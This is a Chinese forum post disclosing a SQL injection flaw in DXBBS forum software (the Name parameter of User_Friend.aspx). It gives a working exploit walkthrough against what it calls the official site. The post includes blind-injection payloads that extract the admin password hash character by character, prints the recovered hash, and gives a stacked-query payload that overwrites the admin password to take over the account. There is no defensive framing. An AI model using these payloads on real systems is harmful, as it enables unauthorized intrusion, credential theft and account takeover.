服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 4700|回复: 1

dxbbs漏洞(通杀7.3以前所有版本)

[复制链接]
dirtysea 发表于 2009-8-15 01:12:56 | 显示全部楼层 |阅读模式
漏洞出现在User_Friend.aspx , 由于过滤不严,造成name允许注入, 不多说了,自己看吧。
-------------------------------------------------------------------------------------------
http://www.dxbbs.cn/

这是DXBBS官方网站,版本是7.3,用的access数据库

在User_Friend.aspx?Action=Add&Name=admin加上''

典型的过滤不严,由于是access,在没有工具的情况下,只能一个一个猜解了

默认管理员是admin, 我们来猜解admin的密码, 工具是老兵的注入浏览器,用的是asc转换猜解法, 我已经下载了一份源代码,可以看一下数据库结构

用户表:DXBBS_user 密码字段:user_pass

http://www.dxbbs.cn/User_Friend. ... ;Name=admin'' {v} and ''a''=''a , 因为后面还有一个单引号,没办法注释,所以只能这么构造注入语句,{v}是变量

首先使用语句确定密码长度
and (select top 1 len(user_pass) from DXBBS_user)=16
返回:好友已存在 说明密码的确是16位,经过了MD5加密

接下来猜解密码:
猜解第一位: and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=''admin'')>=57 返回:数据不存在,猜测错误,说明密码第一位的ASC值小于57

and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=''admin'')>=55
正确,说明密码第一位的ASC值大于等于55

and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=''admin'')>=56
返回错误,说明密码第一位的ASC值大于小于56

既然大于等于55,小于56,那么这个数值就是55,ASC55对应的字符是:7,也就是说,密码第一位是7,

猜测密码第二位就是把
and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=''admin'')>=57
改成
and (select top 1 asc(mid(user_pass,2,1)) from dxbbs_user where user_name=''admin'')>=57

后面的以此类推

5分钟后得到管理员密码:74e92e9ececa0ae7

这是MD5加密过的,至于怎么得到明文,不要问我,自己碰运气吧

下面介绍SQL版利用方法:
ser_Friend.aspx?Action=Add&Name=大蝉;UPDATE [Dxbbs_user] set user_pass=''7a57a5a743894a0e'' where user_name=''admin'';--

name=后面一定要加上已经存在的用户,user_pass=后面加上你的密码,user_name=后面加上你要修改的账户,默认管理员是admin

结束。。。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-4-19 13:26 , Processed in 0.203071 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表